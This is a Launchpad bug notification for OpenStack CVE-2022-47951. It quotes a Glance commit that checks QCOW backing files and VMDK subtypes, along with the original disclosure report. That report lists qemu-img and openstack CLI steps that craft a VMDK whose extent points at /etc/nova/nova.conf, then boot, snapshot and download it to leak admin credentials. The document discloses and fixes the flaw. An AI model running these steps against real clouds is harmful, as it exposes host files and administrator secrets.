Reviewed: https://review.opendev.org/c/openstack/glance/+/871613 Committed: https://opendev.org/openstack/glance/commit/0d6282a01691cecc2798f7858b181c4bb30f850c Submitter: "Zuul (22348)" Branch: master
commit 0d6282a01691cecc2798f7858b181c4bb30f850c Author: Dan Smith <[email protected]> Date: Mon Dec 19 15:00:35 2022 +0000 Enforce image safety during image_conversion This does two things: 1. It makes us check that the QCOW backing_file is unset on those types of images. Nova and Cinder do this already to prevent an arbitrary (and trivial to accomplish) host file exposure exploit. 2. It makes us restrict VMDK files to only allowed subtypes. These files can name arbitrary files on disk as extents, providing the same sort of attack. Default that list to just the types we believe are actually useful for openstack, and which are monolithic. The configuration option to specify allowed subtypes is added in glance's config and not in the import options so that we can extend this check later to image ingest. The format_inspector can tell us what the type and subtype is, and we could reject those images early and even in the case where image_conversion is not enabled. Closes-Bug: #1996188 Change-Id: Idf561f6306cebf756c787d8eefdc452ce44bd5e0 ** Changed in: glance Status: In Progress => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1996188 Title: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951) Status in Cinder: In Progress Status in Glance: Fix Released Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Fix Released Bug description: The vulnerability managers received the following report from Sébastien Meriot with OVH via encrypted E-mail: Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system. After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N). Here is the details : By using a VMDK file, you can dump any file on the hypervisor. 1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat 2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0 3. Upload the image: openstack image create --file leak.vmdk leak.vmdk 4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance 5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance 6. Download the image: openstack image save --file leak-instance-image leak-instance-image 7. You get access to the nova.conf file content and you can get access to the openstack admin creds. We are working on a fix and would be happy to share it with you if needed. We think it does affect Nova but it could affect Glance as well. We're not sure yet. [postscript per Arnaud Morin (amorin) in IRC] cinder seems also affected To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1996188/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : [email protected] Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
